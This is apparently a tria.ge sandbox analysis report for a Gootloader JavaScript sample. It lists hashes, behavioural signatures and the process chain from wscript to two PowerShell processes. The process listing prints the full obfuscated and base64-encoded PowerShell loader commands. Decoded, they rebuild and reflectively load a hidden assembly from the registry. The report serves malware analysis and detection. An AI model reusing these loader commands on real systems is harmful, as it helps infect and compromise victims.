Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23/09/2022, 14:28
Static task
static1
Behavioral task
behavioral1
Sample
gootloader-payload.js
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
gootloader-payload.js
Resource
win10v2004-20220901-en
General
-
Target
gootloader-payload.js
-
Size
245KB
-
MD5
3793a0bc98b744d1ad1a41cad211c08d
-
SHA1
69d470c25bef8d7185263a8288114db3903979e5
-
SHA256
58105e33f351cfa7bde0c3c4dda630379f0f71ddf8dc2a1ce63ea194607f3551
-
SHA512
e18b1f47db6efe21b78c81c05cb18ffbe73e3238a999858331be39a35f1548f975098ff81852f0637e9ee9170c43c0b0d8b63977d805717b7dc9333508a93b74
-
SSDEEP
1536:WRml64QvRDKbimZOQyXjdBMWxXJUGkJPZF40nuOMdo4JpqU1vmROQxB/Nfr27NV5:ShPnluOo3xBX0iRSMzelxUtIATOCsd
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1928 powershell.exe 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1884 wrote to memory of 1928 1884 wscript.exe 27 PID 1884 wrote to memory of 1928 1884 wscript.exe 27 PID 1884 wrote to memory of 1928 1884 wscript.exe 27 PID 1928 wrote to memory of 1852 1928 powershell.exe 29 PID 1928 wrote to memory of 1852 1928 powershell.exe 29 PID 1928 wrote to memory of 1852 1928 powershell.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader-payload.js1⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "/"e" M"gA5ADgANwA4ADUAM"QA5AD"UA"OwBzAG"wAZQ"BlAHA"AIAA"tAHMAIAA"3ADE"AO"wAkAGcAawB3AD0A"RwBlAHQ"A"LQBJAH"QAZQB"t"AFAAcgB"vAHA"AZQByAH"QAe"Q"AgAC"0AcABh"AHQAa"AAgACg"AIgBoAGsAIgA"rACIAYw"B"1AD"oAXABz"AG8A"Zg"Ai"ACsAI"gB0A"HcAIgArACI"AYQByAGU"A"XAB"tAGkAYwAiACsAIgBy"AG8AcwAi"ACsAIgBv"A"G"YAdABc"ACI"AK"wBbAEUAb"gB2AGkAcgB"vA"G4"AbQBl"AG"4"A"dABd"A"Do"AOgAoACIAdQB"zAGUAIg"Ar"A"CI"A"c"gBuAC"IA"K"w"Ai"A"GEAbQ"Bl"ACIAKQArACI"A"MAA"iACkAOwBmAG8Ac"gA"gA"Cg"AJA"BjAH"U"APQAwADsAJA"BjAHUAI"AAt"AGwAZ"QAgADcAMQAwADsA"JABj"AHU"A"KwA"rACkAewB"U"AHI"AeQ"B7A"C"QAZgB5"ACsA"PQAkAGcAawB3AC4"AJ"ABjAHU"AfQ"BDAGEAdABjAGgAewB9A"H"0AOwAkAGMAdQA9ADAAOw"B3"AGg"AaQBsAGUA"K"AAkA"HQAc"gB1AGUAKQB"7"ACQ"AY"wB1ACs"AK"wA7ACQAaw"BvA"D0AWwB"tAG"EAdA"BoAF0AOgA6ACgAIgBzAH"E"A"Ig"ArACIAcgB0ACIAKQA"oACQAY"wB1ACkA"OwBpAGYAKAAkAGsAbwAgAC"0A"ZQBxACAAMQAwADAAMA"ApA"H"sAYgB"yAG"UAYQBrAH0A"fQ"Ak"AHEAY"gByA"D0AJ"A"BmAHkALgByAGUAcABs"AGEAYwBlA"CgAI"g"AjACIALAA"kAGsAbwApADsAJA"B"p"A"HkAYQ"A9AFsA"YgB5AHQAZQBbAF0"AXQA6ADoA"KAAiA"G4A"ZQA"iACs"AIgB3A"CIAKQ"AoA"CQAcQ"BiA"H"IA"Lg"BM"AGUAbgBn"AHQAaAAv"A"DI"AKQA7AGYA"bwBy"ACgA"JA"B"jAHU"AP"Q"AwADsAJA"BjAHUAIAA"tAGw"AdAAgACQAcQ"B"iAH"IALgBMAGU"Ab"gB"nA"HQ"Aa"A"A"7ACQ"AYwB1"ACsAPQAyACkAew"AkAGkAeQBh"AFs"AJABjA"H"UA"Lw"AyAF0APQBbAGM"Abw"BuAH"YA"ZQBy"AHQAXQ"A6ADo"A"K"AA"i"A"FQ"Abw"BCACIAKw"AiA"HkAdABl"A"CIAKQAoA"C"Q"AcQB"iAHI"A"LgBTAHUAYgB"zAHQAcgBpA"G"4AZwA"oA"CQ"AY"wB1AC"wAMgAp"ACwAKAAyA"Co"AO"AA"pAC"kAf"QBbAHIAZ"QBm"AGw"A"ZQBjA"HQA"aQB"vA"G4ALgBhA"H"MA"cwBl"AG"0AY"g"BsAH"kA"XQA6AD"o"A"KAAiAEwAbwAiAC"sAI"gBhAGQAIgA"pACgAJABpAHk"AYQApADs"AWwBPAHAAZQBu"AF0"AOgA6ACgA"IgBUAGUAI"gArACIAcwB0ACIAKQAoACkAOw"A5ADYAMQA4ADIAM"AA5ADA"ANwA7A"A==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /e MgA5ADgANwA4ADUAMQA5ADUAOwBzAGwAZQBlAHAAIAAtAHMAIAA3ADEAOwAkAGcAawB3AD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcACIAKwBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgAoACIAdQBzAGUAIgArACIAcgBuACIAKwAiAGEAbQBlACIAKQArACIAMAAiACkAOwBmAG8AcgAgACgAJABjAHUAPQAwADsAJABjAHUAIAAtAGwAZQAgADcAMQAwADsAJABjAHUAKwArACkAewBUAHIAeQB7ACQAZgB5ACsAPQAkAGcAawB3AC4AJABjAHUAfQBDAGEAdABjAGgAewB9AH0AOwAkAGMAdQA9ADAAOwB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7ACQAYwB1ACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAYwB1ACkAOwBpAGYAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAYgByAGUAYQBrAH0AfQAkAHEAYgByAD0AJABmAHkALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApADsAJABpAHkAYQA9AFsAYgB5AHQAZQBbAF0AXQA6ADoAKAAiAG4AZQAiACsAIgB3ACIAKQAoACQAcQBiAHIALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJABjAHUAPQAwADsAJABjAHUAIAAtAGwAdAAgACQAcQBiAHIALgBMAGUAbgBnAHQAaAA7ACQAYwB1ACsAPQAyACkAewAkAGkAeQBhAFsAJABjAHUALwAyAF0APQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAFQAbwBCACIAKwAiAHkAdABlACIAKQAoACQAcQBiAHIALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwB1ACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABpAHkAYQApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA5ADYAMQA4ADIAMAA5ADAANwA7AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5194783cfed5b69a042177d40c01765a5
SHA19891e4352f8183ef98c52a697c3517f221e00656
SHA25688db0219d8c945d21dd4572acef9e03b90b2a456748c69ddb5644e5c5f16019b
SHA51247f9c1c89de02261b8eadbf138717a23f1b8892e3114a7a710bbdd3d8cb1051cbcd7aaa80634fea111c34ad677afe6437eaf2f19fbff9c67bc835f1053240e26